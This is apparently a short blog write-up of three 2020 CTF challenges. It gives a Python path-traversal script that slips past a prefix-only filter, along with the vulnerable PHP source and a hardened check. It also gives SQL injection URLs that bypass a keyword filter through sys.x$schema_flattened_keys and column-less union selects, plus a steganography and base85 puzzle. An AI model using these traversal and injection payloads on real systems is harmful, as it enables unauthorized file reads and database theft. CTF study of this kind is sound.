Anheng July CTF

2020-07-26, 40 views, 0 comments

Preface


Just a few challenges, some quick notes.

ezfileinclude


Opening the challenge link shows an image. Viewing the page source, the img tag contains a URL of the form /image.php?t=xxxxx&f=base64(xxxx).

The challenge is about file reading, so the exploitable point is clearly the f parameter; however, only a leading ../ is filtered.

Here I use Hhhm's script:

import time
import requests
import base64


# The filter only inspects the start of the decoded path, so a harmless
# leading directory component hides the traversal sequence that follows.
file = "hhhm/../../../../../../../../flag"
file = base64.b64encode(file.encode())
url = "http://183.129.189.60:10009/image.php?t={0}&f={1}"
# The server rejects requests whose t is more than 10 seconds from its clock.
now = int(time.time())
rep = requests.get(url.format(str(now), file.decode()))
print(rep.text)

Source code

<?php

    if(!isset($_GET['t']) || !isset($_GET['f'])){
        echo "you miss some parameters";
        exit();
    }

    $timestamp = time();

    if(abs($_GET['t'] - $timestamp) > 10){
        echo "what's your time?";
        exit();
    }

    $file = base64_decode($_GET['f']);

    if(substr($file, 0, strlen("/../")) === "/../" || substr($file, 0, strlen("../")) === "../" || substr($file, 0, strlen("./")) === "./" || substr($file, 0, strlen("/.")) === "/." || substr($file, 0, strlen("//")) === "//") {
        echo 'You are not allowed to do that.';
    }
    else{
        echo file_get_contents('/var/www/html/img/'.$file);
    }

?>
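The check in the source above only inspects the first characters of the decoded path, which is why the hhhm/../ trick in the script passes it. As an added illustration (not part of the original write-up), the Python below reproduces that prefix test next to a normalise-and-confine check; IMG_DIR comes from the PHP source, the function names are my own, and the confine check works on path strings only (a live server would also need to resolve symlinks).

```python
import posixpath
from typing import Optional

# Directory the PHP code prepends to the user-supplied file name.
IMG_DIR = "/var/www/html/img"

# Prefixes rejected by the challenge's substr() comparisons, in the same order.
BLOCKED_PREFIXES = ("/../", "../", "./", "/.", "//")


def prefix_check_allows(file: str) -> bool:
    """Re-implementation of the original filter.

    Only the start of the decoded path is inspected, so a traversal
    sequence appearing after any other component is never seen.
    """
    return not file.startswith(BLOCKED_PREFIXES)


def confined_path(file: str, base: str = IMG_DIR) -> Optional[str]:
    """Hardened variant: join, normalise, then require the result to stay
    under base. Returns the normalised path, or None if it escapes.

    Hypothetical replacement written for this note; it normalises the
    string only and does not resolve symlinks on a real filesystem.
    """
    if "\x00" in file or posixpath.isabs(file):
        return None
    full = posixpath.normpath(posixpath.join(base, file))
    if full == base or full.startswith(base + "/"):
        return full
    return None


if __name__ == "__main__":
    payload = "hhhm/../../../../../../../../flag"  # from the write-up's script
    print("prefix filter allows payload:", prefix_check_allows(payload))
    print("confined path for payload:", confined_path(payload))
    print("confined path for logo.png:", confined_path("logo.png"))
```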

Sqil


Fuzzing first reveals the regex:

return preg_match("/;|benchmark|\^|if|[\s]|in|case|when|sleep|auto|desc|stat|\||lock|or|and|&|like|-|`/i", $id);

Both in and or are filtered, which means information_schema cannot be used.

Generally there are two ways to bypass the information_schema restriction:

  • sys.x$schema_flattened_keys
  • sys.schema_table_statistics_with_buffer

But the second one contains stat, which is filtered, so the first method is used. Payload to dump the table names:

http://183.129.189.60:10004/?id=0%27/**/union/**/select/**/1,2,group_concat(table_name)from/**/sys.x$schema_flattened_keys/**/where/**/table_schema=database()%23

Response:

Array ( [0] => 1 [id] => 1 [1] => 2 [username] => 2 [2] => flllaaaggg,users [password] => flllaaaggg,users )

There are two tables, flllaaaggg and users. Column-name-less injection can be used here; for reference see: injection without knowing the column names.

Reading the users table:

http://183.129.189.60:10004/?id=0%27/**/union/**/select/**/1,2,(select/**/group_concat(c)/**/from(select/**/1/**/as/**/a,2/**/as/**/b,3/**/as/**/c/**/union/**/select*from/**/users)x)%23

Reading the flllaaaggg table:

http://183.129.189.60:10004/?id=0%27/**/union/**/select/**/1,2,(select/**/group_concat(b)/**/from(select/**/1/**/as/**/a,2/**/as/**/b/**/union/**/select*from/**/flllaaaggg)x)%23

MISC-welcome


If I remember correctly, this was originally a HuFu CTF (虎符) challenge. The attachment consists of two files, flag.rar and red_blue.png.

Open the image in Stegsolve; Save Bin extracts the hidden image directly, and it turns out to contain the password /*///1258/*/@#

Extracting the archive with 360 reveals:

Ao(mgHXo,o0fV'I2J"^%3&**H@q.MQ1,V%$1GCdB0P"X%0RW

I did not think of base85 encoding at the time, so I did not solve it.

Decoding it online gives the flag: http://ctf.ssleye.com/base85.html


